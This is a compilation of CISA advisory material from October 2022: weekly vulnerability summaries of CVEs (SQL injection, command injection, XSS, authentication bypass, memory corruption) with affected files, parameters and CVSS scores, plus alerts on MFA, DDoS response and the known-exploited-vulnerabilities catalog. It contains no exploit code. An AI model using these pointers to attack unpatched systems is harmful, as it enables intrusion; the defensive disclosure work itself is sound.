seccome — ehoney A vulnerability, which was classified as critical, was found in seccome Ehoney. Affected is an unknown function of the file /api/v1/attack/falco. The manipulation of the argument Payload leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-212412. 2022-10-28 not yet calculated CVE-2022-3730
N/A
seccome — ehoney A vulnerability has been found in seccome Ehoney and classified as critical. Affected by this vulnerability is an unknown functionality of the file /api/v1/attack/token. The manipulation of the argument Payload leads to sql injection. The attack can be launched remotely. The identifier VDB-212413 was assigned to this vulnerability. 2022-10-28 not yet calculated CVE-2022-3731
N/A
seccome — ehoney A vulnerability was found in seccome Ehoney and classified as critical. Affected by this issue is some unknown functionality of the file /api/v1/bait/set. The manipulation of the argument Payload leads to sql injection. The attack may be launched remotely. VDB-212414 is the identifier assigned to this vulnerability. 2022-10-28 not yet calculated CVE-2022-3732
N/A
seccome — ehoney A vulnerability was found in seccome Ehoney. It has been rated as critical. This issue affects some unknown processing of the file /api/public/signup. The manipulation leads to improper access controls. The identifier VDB-212417 was assigned to this vulnerability. 2022-10-28 not yet calculated CVE-2022-3735
N/A
snyk — joyqi/hyper-down The package joyqi/hyper-down from 0.0.0 is vulnerable to Cross-site Scripting (XSS) because the Markdown parsing module does not properly filter the href attribute. 2022-10-26 not yet calculated CVE-2022-25849
CONFIRM

sourcecodester — web-based_student_clearance_system

A vulnerability was found in SourceCodester Web-Based Student Clearance System. It has been classified as critical. This affects an unknown part of the file Admin/edit-admin.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212415. 2022-10-28 not yet calculated CVE-2022-3733
N/A
N/A
stimulsoft — stimulsoft Stimulsoft (aka Stimulsoft Reports) 2013.1.1600.0, when Compilation Mode is used, allows an attacker to execute arbitrary C# code on any machine that renders a report, including the application server or a user’s local machine, as demonstrated by System.Diagnostics.Process.Start. 2022-10-29 not yet calculated CVE-2021-42777
MISC
vmware — cloud_foundation VMware Cloud Foundation (NSX-V) contains an XML External Entity (XXE) vulnerability. On VCF 3.x instances with NSX-V deployed, this may allow a user to exploit this issue leading to a denial-of-service condition or unintended information disclosure. 2022-10-28 not yet calculated CVE-2022-31678
MISC
wasm-interp — wasm-interp wasm-interp v1.0.29 was discovered to contain an out-of-bounds read via the component OnReturnCallExpr->GetReturnCallDropKeepCount. 2022-10-28 not yet calculated CVE-2022-43280
MISC
wasm-interp — wasm-interp wasm-interp v1.0.29 was discovered to contain a heap overflow via the component std::vector<wabt::Type, std::allocator<wabt::Type>>::size() at /bits/stl_vector.h. 2022-10-28 not yet calculated CVE-2022-43281
MISC
wasm-interp — wasm-interp wasm-interp v1.0.29 was discovered to contain an out-of-bounds read via the component OnReturnCallIndirectExpr->GetReturnCallDropKeepCount. 2022-10-28 not yet calculated CVE-2022-43282
MISC
wasm2c — wasm2c wasm2c v1.0.29 was discovered to contain an abort in CWriter::Write. 2022-10-28 not yet calculated CVE-2022-43283
MISC

wireshark — wireshark

Crash in the OPUS protocol dissector in Wireshark 3.6.0 to 3.6.8 allows denial of service via packet injection or crafted capture file 2022-10-27 not yet calculated CVE-2022-3725
MISC
MISC
CONFIRM
withsecure — f-secure_policy_manager Reflected cross-site scripting (XSS) vulnerabilities in WithSecure (through 2022-08-10) exist within the F-Secure Policy Manager due to an unvalidated parameter in the endpoint, which allows remote attackers to provide a malicious input. 2022-10-25 not yet calculated CVE-2022-38162
MISC
MISC
MISC
wordpress — wordpress Auth. (editor+) Reflected Cross-Site Scripting (XSS) vulnerability in ExpressTech Quiz And Survey Master plugin <= 7.3.4 on WordPress. 2022-10-28 not yet calculated CVE-2021-36864
CONFIRM
CONFIRM
wordpress — wordpress Auth. SQL Injection (SQLi) vulnerability in Quiz And Survey Master plugin <= 7.3.4 on WordPress. 2022-10-28 not yet calculated CVE-2021-36898
CONFIRM
CONFIRM

wordpress — wordpress

The demon image annotation plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.7. This is due to missing nonce validation in the ~/includes/settings.php file. This makes it possible for unauthenticated attackers to modify the plugin’s settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2022-10-28 not yet calculated CVE-2022-2864
MISC
MISC
MISC
wordpress — wordpress The Bricks theme for WordPress is vulnerable to remote code execution due to the theme allowing site editors to include executable code blocks in website content in versions 1.2 to 1.5.3. This, combined with the missing authorization vulnerability (CVE-2022-3400), makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to edit any page, post, or template on the vulnerable WordPress website and inject a code execution block that can be used to achieve remote code execution. 2022-10-28 not yet calculated CVE-2022-3401
MISC
MISC
wordpress — wordpress The Log HTTP Requests plugin for WordPress is vulnerable to Stored Cross-Site Scripting via logged HTTP requests in versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers who can trick a site’s administrator into performing an action like clicking on a link, or an authenticated user with access to a page that sends a request using user-supplied data via the server, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2022-10-28 not yet calculated CVE-2022-3402
MISC
MISC
MISC
wordpress — wordpress The Web Stories plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including 1.24.0 due to insufficient validation of URLs supplied via the ‘url’ parameter found via the /v1/hotlink/proxy REST API Endpoint. This made it possible for authenticated users to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. 2022-10-28 not yet calculated CVE-2022-3708
MISC
MISC
MISC
MISC
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in ThemeFusion Avada premium theme versions <= 7.8.1 on WordPress leading to arbitrary plugin installation/activation. 2022-10-27 not yet calculated CVE-2022-41996
CONFIRM
CONFIRM
CONFIRM

This product is provided subject to this Notification and this Privacy & Use policy.

CISA Releases Guidance on Phishing-Resistant and Numbers Matching Multifactor Authentication 

Original release date: October 31, 2022

CISA has released two fact sheets to highlight threats against accounts and systems using certain forms of multifactor authentication (MFA). CISA strongly urges all organizations to implement phishing-resistant MFA to protect against phishing and other known cyber threats. If an organization using mobile push-notification-based MFA is unable to implement phishing-resistant MFA, CISA recommends using number matching to mitigate MFA fatigue. Although number matching is not as strong as phishing-resistant MFA, it is one of the best interim mitigations for organizations that may not immediately be able to implement phishing-resistant MFA.

CISA recommends users and organizations see CISA fact sheets Implementing Phishing-Resistant MFA and Implementing Number Matching in MFA Applications. Visit CISA.gov/MFA for more information on MFA, including an infographic of the hierarchy of MFA options.

Joint CISA FBI MS-ISAC Guide on Responding to DDoS Attacks and DDoS Guidance for Federal Agencies

Original release date: October 28, 2022

CISA, the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have released Understanding and Responding to Distributed Denial-of-Service Attacks to provide organizations with proactive steps to reduce the likelihood and impact of distributed denial-of-service (DDoS) attacks. The guidance is for both network defenders and leaders to help them understand and respond to DDoS attacks, which can cost an organization time, money, and reputational damage.

Concurrently, CISA has released Capacity Enhancement Guide (CEG): Additional DDoS Guidance for Federal Agencies, which provides federal civilian executive branch (FCEB) agencies additional DDoS guidance, including recommended FCEB contract vehicles and services that provide DDoS protection and mitigations. 

CISA encourages all network defenders and leaders to review:

  • Joint guide: Understanding and Responding to Distributed Denial-of-Service Attacks
    • https://www.cisa.gov/sites/default/files/publications/understanding-and-responding-to-ddos-attacks_508c.pdf
  • CEG: Additional DDoS Guidance for Federal Agencies
    • https://www.cisa.gov/sites/default/files/publications/ceg-additional-ddos-guidance-for-federal-agencies_508c.pdf
  • Tip: Understanding Denial-of-Service Attacks

CISA Adds Six Known Exploited Vulnerabilities to Catalog

Original release date: October 24, 2022

CISA has added six vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow in the “Date Added to Catalog” column, which will sort by descending dates.      

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.   

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the specified criteria.     

Vulnerability Summary for the Week of October 17, 2022

Original release date: October 24, 2022

 

High Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
74cms — 74cmsse An arbitrary file upload vulnerability in the component /apiadmin/upload/attach of 74cmsSE v3.13.0 allows attackers to execute arbitrary code via a crafted PHP file. 2022-10-17 9.8 CVE-2022-42154
MISC
acer — altos_w2000h-w570h_f4_firmware Acer Altos W2000h-W570h F4 R01.03.0018 was discovered to contain a stack overflow in the RevserveMem component. This vulnerability allows attackers to cause a Denial of Service (DoS) via injecting crafted shellcode into the NVRAM variable. 2022-10-19 9.8 CVE-2022-41415
MISC
MISC
MISC
adobe — acrobat_reader_dc Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38450
MISC
adobe — acrobat_reader_dc Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-42339
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server. 2022-10-14 9.8 CVE-2022-35690
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server. 2022-10-14 9.8 CVE-2022-35710
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server. 2022-10-14 9.8 CVE-2022-35711
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server. 2022-10-14 9.8 CVE-2022-35712
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. 2022-10-14 9.8 CVE-2022-38418
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Restriction of XML External Entity Reference (‘XXE’) vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction. 2022-10-14 7.5 CVE-2022-38419
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Use of Hard-coded Credentials vulnerability that could result in application denial-of-service by gaining access to start/stop arbitrary services. Exploitation of this issue does not require user interaction. 2022-10-14 7.5 CVE-2022-38420
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in information disclosure. Exploitation of this issue does not require user interaction. 2022-10-14 7.5 CVE-2022-38422
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction. 2022-10-14 7.5 CVE-2022-42340
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Restriction of XML External Entity Reference (‘XXE’) vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction. 2022-10-14 7.5 CVE-2022-42341
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, but does require administrator privileges. 2022-10-14 7.2 CVE-2022-38421
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in arbitrary file system write. Exploitation of this issue does not require user interaction, but does require administrator privileges. 2022-10-14 7.2 CVE-2022-38424
MISC
adobe — dimension Adobe Dimension versions 3.4.5 is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38440
MISC
adobe — dimension Adobe Dimension versions 3.4.5 is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38441
MISC
adobe — dimension Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38442
MISC
adobe — dimension Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38444
MISC
adobe — dimension Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38445
MISC
adobe — dimension Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38446
MISC
adobe — dimension Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38447
MISC
adobe — dimension Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38448
MISC
aethon — tug_home_base_server Aethon TUG Home Base Server versions prior to version 24 are affected by an unauthenticated attacker who can freely access hashed user credentials. 2022-10-21 8.2 CVE-2022-1066
MISC
aethon — tug_home_base_server Aethon TUG Home Base Server versions prior to version 24 are affected by an unauthenticated attacker who can freely access hashed user credentials. 2022-10-21 8.1 CVE-2022-1070
MISC
aethon — tug_home_base_server Aethon TUG Home Base Server versions prior to version 24 are affected by an unauthenticated attacker who can freely access hashed user credentials. 2022-10-21 7.5 CVE-2022-26423
MISC
anji-plus — report anji-plus AJ-Report 0.9.8.6 allows remote attackers to bypass login authentication by spoofing JWT Tokens. 2022-10-17 8.8 CVE-2022-42983
MISC
MISC
apache — dubbo A deserialization vulnerability existed in dubbo hessian-lite 3.2.12 and its earlier versions, which could lead to malicious code execution. This issue affects Apache Dubbo 2.7.x version 2.7.17 and prior versions; Apache Dubbo 3.0.x version 3.0.11 and prior versions; Apache Dubbo 3.1.x version 3.1.0 and prior versions. 2022-10-18 9.8 CVE-2022-39198
MISC
asus — asusswitch AsusSwitch.exe on ASUS personal computers (running Windows) sets weak file permissions, leading to local privilege escalation (this also can be used to delete files within the system arbitrarily). This affects ASUS System Control Interface 3 before 3.1.5.0, and AsusSwitch.exe before 1.0.10.0. 2022-10-18 7.8 CVE-2022-36438
MISC
MISC
atlassian — jira_align The MasterUserEdit API in Atlassian Jira Align Server before version 10.109.2 allows an authenticated attacker with the People role permission to use the MasterUserEdit API to modify any user’s role to Super Admin. This vulnerability was reported by Jacob Shafer from Bishop Fox. 2022-10-14 8.8 CVE-2022-36803
MISC
autodesk — autocad_plant_3d A maliciously crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42936
MISC
autodesk — autocad_plant_3d A maliciously crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42937
MISC
autodesk — autocad_plant_3d A maliciously crafted TGA file when consumed through DesignReview.exe application could lead to memory corruption vulnerability. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42938
MISC
autodesk — autocad_plant_3d A maliciously crafted TGA file when consumed through DesignReview.exe application could lead to memory corruption vulnerability. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42939
MISC
autodesk — autocad_plant_3d A maliciously crafted TGA file when consumed through DesignReview.exe application could lead to memory corruption vulnerability. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42940
MISC
autodesk — autocad_plant_3d A maliciously crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42941
MISC
autodesk — autocad_plant_3d A maliciously crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42942
MISC
autodesk — design_review A maliciously crafted PCT file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-14 7.8 CVE-2022-41306
MISC
autodesk — fbx_software_development_kit An Out-Of-Bounds Read Vulnerability in Autodesk FBX SDK version 2020. and prior may lead to code execution or information disclosure through maliciously crafted FBX files. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-14 7.8 CVE-2022-41302
MISC
autodesk — fbx_software_development_kit A user may be tricked into opening a malicious FBX file which may exploit a use-after-free vulnerability in Autodesk FBX SDK 2020 version causing the application to reference a memory location controlled by an unauthorized third party, thereby running arbitrary code on the system. 2022-10-14 7.8 CVE-2022-41303
MISC
autodesk — fbx_software_development_kit An Out-Of-Bounds Write Vulnerability in Autodesk FBX SDK 2020 version and prior may lead to code execution through maliciously crafted FBX files or information disclosure. 2022-10-14 7.8 CVE-2022-41304
MISC
autodesk — subassembly_composer A maliciously crafted PKT file when consumed through SubassemblyComposer.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-14 7.8 CVE-2022-41305
MISC
autodesk — subassembly_composer A maliciously crafted PKT file when consumed through SubassemblyComposer.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-14 7.8 CVE-2022-41307
MISC
autodesk — subassembly_composer A maliciously crafted PKT file when consumed through SubassemblyComposer.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-14 7.8 CVE-2022-41308
MISC
avira — avira_security A vulnerability within the Software Updater functionality of Avira Security for Windows allowed an attacker with write access to the filesystem to escalate his privileges in certain scenarios. The issue was fixed with Avira Security version 1.1.72.30556. 2022-10-17 8.8 CVE-2022-3368
MISC
best_student_result_management_system_project — best_student_result_management_system Best Student Result Management System v1.0 is vulnerable to SQL Injection via /upresult/upresult/notice-details.php?nid=. 2022-10-20 9.8 CVE-2022-42021
MISC
billing_system_project — billing_system Billing System Project v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /phpinventory/editbrand.php. 2022-10-17 7.2 CVE-2022-41498
MISC
billing_system_project — billing_system An arbitrary file upload vulnerability in the component /php_action/editProductImage.php of Billing System Project v1.0 allows attackers to execute arbitrary code via a crafted PHP file. 2022-10-18 7.2 CVE-2022-41504
MISC
boxbilling — boxbilling Unrestricted Upload of File with Dangerous Type in GitHub repository boxbilling/boxbilling prior to 0.0.1. 2022-10-17 7.2 CVE-2022-3552
CONFIRM
MISC
canteen_management_system_project — canteen_management_system A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument business leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-211192. 2022-10-18 9.8 CVE-2022-3583
MISC
MISC
canteen_management_system_project — canteen_management_system A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file edituser.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-211193 was assigned to this vulnerability. 2022-10-18 8.8 CVE-2022-3584
MISC
MISC
cashier_queuing_system_project — cashier_queuing_system A vulnerability classified as critical was found in SourceCodester Cashier Queuing System 1.0. This vulnerability affects unknown code of the file /queuing/login.php of the component Login Page. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-211186 is the identifier assigned to this vulnerability. 2022-10-18 8.8 CVE-2022-3579
MISC
MISC
chamilo — chamilo Chamilo 1.11.16 is affected by an authenticated local file inclusion vulnerability which allows authenticated users with access to ‘big file uploads’ to copy/move files from anywhere in the file system into the web directory. 2022-10-17 8.8 CVE-2022-42029
MISC
changingtec — rava_certificate_validation_system RAVA certificate validation system has insufficient validation for user input. An unauthenticated remote attacker can inject arbitrary SQL command to access, modify and delete database. 2022-10-18 9.8 CVE-2022-39056
MISC
changingtec — rava_certificate_validation_system RAVA certification validation system has a path traversal vulnerability. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and access arbitrary system files. 2022-10-18 7.5 CVE-2022-39058
MISC
changingtec — rava_certificate_validation_system RAVA certificate validation system has insufficient filtering for special parameter of the web page input field. A remote attacker with administrator privilege can exploit this vulnerability to perform arbitrary system command and disrupt service. 2022-10-18 7.2 CVE-2022-39057
MISC
codexpert — search_logger The Search Logger WordPress plugin through 0.9 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users. 2022-10-17 7.2 CVE-2022-3131
MISC
devexpress — asp.net_web_forms_controls The DevExpress Resource Handler (ASPxHttpHandlerModule) in DevExpress ASP.NET Web Forms Build v19.2.3 does not verify the referenced objects in the /DXR.axd?r= HTTP GET parameter. This leads to an Insecure Direct Object References (IDOR) vulnerability which allows attackers to access the application source code. 2022-10-18 7.5 CVE-2022-41479
MISC
djangoproject — django In Django 3.2 before 3.2.16, 4.0 before 4.0.8, and 4.1 before 4.1.2, internationalized URLs were subject to a potential denial of service attack via the locale parameter, which is treated as a regular expression. 2022-10-16 7.5 CVE-2022-41323
MISC
MISC
CONFIRM
MISC
dlink — dir-878_firmware D-Link DIR878 1.30B08 Hotfix_04 was discovered to contain a command injection vulnerability via the component /bin/proc.cgi. 2022-10-19 9.8 CVE-2022-43184
MISC
MISC
dlink — dsl-2750b_firmware D-Link DSL-2750B devices before 1.05 allow remote unauthenticated command injection via the login.cgi cli parameter, as exploited in the wild in 2016 through 2022. 2022-10-19 9.8 CVE-2016-20017
MISC
MISC
MISC
emlog — emlog Emlog Pro 1.6.0 plugins upload suffers from a remote code execution (RCE) vulnerability. 2022-10-21 7.2 CVE-2022-42189
MISC
eve-ng — eve-ng An arbitrary file upload vulnerability in the apiImportLabs function in api_labs.php of EVE-NG 2.0.3-112 Community allows attackers to execute arbitrary code via a crafted UNL file. 2022-10-20 7.2 CVE-2022-31366
MISC
MISC
exim — exim A vulnerability was found in Exim and classified as problematic. This issue affects some unknown processing of the component Regex Handler. The manipulation leads to use after free. The name of the patch is 4e9ed49f8f12eb331b29bd5b6dc3693c520fddc2. It is recommended to apply a patch to fix this issue. The identifier VDB-211073 was assigned to this vulnerability. 2022-10-17 7.5 CVE-2022-3559
MISC
MISC
MISC
eyoucms — eyoucms EyouCMS V1.5.9 was discovered to contain multiple Cross-Site Request Forgery (CSRF) vulnerabilities via the Members Center, Editorial Membership, and Points Recharge components. 2022-10-18 8.8 CVE-2022-41500
MISC
f5 — big-ip_access_policy_manager In BIG-IP versions 17.0.x before 17.0.0.1, 16.1.x before 16.1.3.2, 15.1.x before 15.1.7, 14.1.x before 14.1.5.2, and 13.1.x before 13.1.5.1, when a sideband iRule is configured on a virtual server, undisclosed traffic can cause an increase in memory resource utilization. 2022-10-19 7.5 CVE-2022-41624
MISC
f5 — big-ip_advanced_firewall_manager In versions 16.1.x before 16.1.3.2 and 15.1.x before 15.1.5.1, when BIG-IP AFM Network Address Translation policy with IPv6/IPv4 translation rules is configured on a virtual server, undisclosed requests can cause an increase in memory resource utilization. 2022-10-19 7.5 CVE-2022-41806
MISC
f5 — big-ip_analytics In BIG-IP versions 17.0.x before 17.0.0.1, 16.1.x before 16.1.3.1, 15.1.x before 15.1.7, and 14.1.x before 14.1.5.1, when an LTM TCP profile with Auto Receive Window Enabled is configured on a virtual server, undisclosed traffic can cause the virtual server to stop processing new client connections. 2022-10-19 7.5 CVE-2022-36795
MISC
f5 — big-ip_application_security_manager When a BIG-IP Advanced WAF/ASM security policy is configured on a virtual server, undisclosed requests can cause the bd process to terminate. 2022-10-19 7.5 CVE-2022-41691
MISC
f5 — big-ip_application_security_manager In versions 16.1.x before 16.1.3.1, 15.1.x before 15.1.6.1, 14.1.x before 14.1.5.1, and 13.1.x before 13.1.5.1, when the Advanced WAF / ASM module is provisioned, an authenticated remote code execution vulnerability exists in the BIG-IP iControl REST interface. 2022-10-19 7.2 CVE-2022-41617
MISC
f5 — big-ip_local_traffic_manager In BIG-IP versions 17.0.x before 17.0.0.1, 16.1.x before 16.1.3.1, 15.1.x before 15.1.6.1, 14.1.x before 14.1.5.1, and 13.1.x before 13.1.5.1, when DNS profile is configured on a virtual server with DNS Express enabled, undisclosed DNS queries with DNSSEC can cause TMM to terminate. 2022-10-19 7.5 CVE-2022-41787
MISC
f5 — nginx_plus NGINX Plus before versions R27 P1 and R26 P1 have a vulnerability in the module ngx_http_hls_module that might allow a local attacker to corrupt NGINX worker memory, resulting in its crash or potential other impact using a specially crafted audio or video file. The issue affects only NGINX Plus when the hls directive is used in the configuration file. Further, the attack is possible only if an attacker can trigger processing of a specially crafted audio or video file with the module ngx_http_hls_module. 2022-10-19 7 CVE-2022-41743
MISC
feishu — feishu Beijing Feishu Technology Co., Ltd Feishu v3.40.3 was discovered to contain an untrusted search path vulnerability. 2022-10-18 7.8 CVE-2021-3305
MISC
MISC
MISC
MISC
fortinet — fortios An access of uninitialized pointer in Fortinet FortiOS version 7.2.0, 7.0.0 through 7.0.5, 6.4.0 through 6.4.8, 6.2.0 through 6.2.10, 6.0.x, FortiProxy version 7.0.0 through 7.0.4, 2.0.0 through 2.0.9, 1.2.x allows a remote unauthenticated or authenticated attacker to crash the sslvpn daemon via an HTTP GET request. 2022-10-18 7.5 CVE-2022-29055
CONFIRM
fortinet — fortiswitchmanager An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests. 2022-10-18 9.8 CVE-2022-40684
CONFIRM
MISC
fortinet — fortitester An improper neutralization of special elements used in an OS Command (‘OS Command Injection’) vulnerabilities [CWE-78] in Telnet login components of FortiTester 2.3.0 through 3.9.1, 4.0.0 through 4.2.0, 7.0.0 through 7.1.0 may allow an unauthenticated remote attacker to execute arbitrary command in the underlying shell. 2022-10-18 9.8 CVE-2022-33872
CONFIRM
fortinet — fortitester An improper neutralization of special elements used in an OS Command (‘OS Command Injection’) vulnerabilities [CWE-78] in Console login components of FortiTester 2.3.0 through 3.9.1, 4.0.0 through 4.2.0, 7.0.0 through 7.1.0 may allow an unauthenticated attacker to execute arbitrary command in the underlying shell. 2022-10-18 9.8 CVE-2022-33873
CONFIRM
fortinet — fortitester An improper neutralization of special elements used in an OS Command (‘OS Command Injection’) vulnerabilities [CWE-78] in SSH login components of FortiTester 2.3.0 through 3.9.1, 4.0.0 through 4.2.0, 7.0.0 through 7.1.0 may allow an unauthenticated remote attacker to execute arbitrary command in the underlying shell. 2022-10-18 9.8 CVE-2022-33874
CONFIRM
fortinet — fortitester An improper restriction of excessive authentication attempts vulnerability [CWE-307] in FortiTester Telnet port 2.3.0 through 3.9.1, 4.0.0 through 4.2.0, 7.0.0 through 7.1.0 may allow an unauthenticated attacker to guess the credentials of an admin user via a brute force attack. 2022-10-18 9.8 CVE-2022-35846
CONFIRM
